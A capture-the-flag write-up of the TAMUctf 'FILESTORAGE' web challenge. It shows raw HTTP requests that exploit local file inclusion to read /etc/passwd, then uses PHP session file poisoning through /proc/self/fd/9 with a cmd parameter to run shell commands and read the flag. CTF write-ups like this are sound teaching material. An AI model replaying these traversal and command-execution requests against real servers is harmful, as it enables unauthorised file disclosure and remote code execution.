# ▼▼▼FILESTORAGE(Web:122pts,166/661=25.1％)▼▼▼  
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

\---

## 【Vulnerability identification】

```  
GET /index.php?file=../../../../../etc/passwd HTTP/1.1  
Host: filestorage.tamuctf.com  
```

↓

```  
back  
root:x:0:0:root:/root:/bin/ash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/mail:/sbin/nologin  
news:x:9:13:news:/usr/lib/news:/sbin/nologin  
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
man:x:13:15:man:/usr/man:/sbin/nologin  
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin  
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin  
ftp:x:21:21::/var/lib/ftp:/sbin/nologin  
sshd:x:22:22:sshd:/dev/null:/sbin/nologin  
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin  
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin  
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin  
games:x:35:35:games:/usr/games:/sbin/nologin  
cyrus:x:85:12::/usr/cyrus:/sbin/nologin  
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin  
ntp:x:123:123:NTP:/var/empty:/sbin/nologin  
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin  
guest:x:405:100:guest:/dev/null:/sbin/nologin  
nobody:x:65534:65534:nobody:/:/sbin/nologin  
apache:x:100:101:apache:/var/www:/sbin/nologin  
```

↓

**LFI(Locat File Inclusion)** vulnerability exists

\---

## 【exploit】

Send PHP code in request

↓

```  
POST /index.php HTTP/1.1  
Host: filestorage.tamuctf.com  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=diimunr8iaco7vt7alo835ou8g

name=sss  
```

\---

Load code with LFI and execute arbitrary code

↓

```  
GET /index.php?cmd=ls%20/&file=../../../../../proc/self/fd/9 HTTP/1.1  
Host: filestorage.tamuctf.com  
Cookie: PHPSESSID=diimunr8iaco7vt7alo835ou8g  
Connection: close  
```

↓

```  
bin  
dev  
etc  
flag_is_here  
home  
lib  
media  
mnt  
opt  
proc  
root  
run  
sbin  
srv  
start.sh  
sys  
tmp  
usr  
var  
```

↓

`flag_is_here`

\---

```  
GET /index.php?cmd=ls%20/flag_is_here&file=../../../../../proc/self/fd/9
HTTP/1.1  
Host: filestorage.tamuctf.com  
Cookie: PHPSESSID=diimunr8iaco7vt7alo835ou8g  
Connection: close  
```

↓

`flag.txt`

\---

```  
GET
/index.php?cmd=cat%20/flag_is_here/flag.txt&file=../../../../../proc/self/fd/9
HTTP/1.1  
Host: filestorage.tamuctf.com  
Cookie: PHPSESSID=diimunr8iaco7vt7alo835ou8g  
Connection: close  
```

↓

`gigem{535510n_f1l3_p0150n1n6}`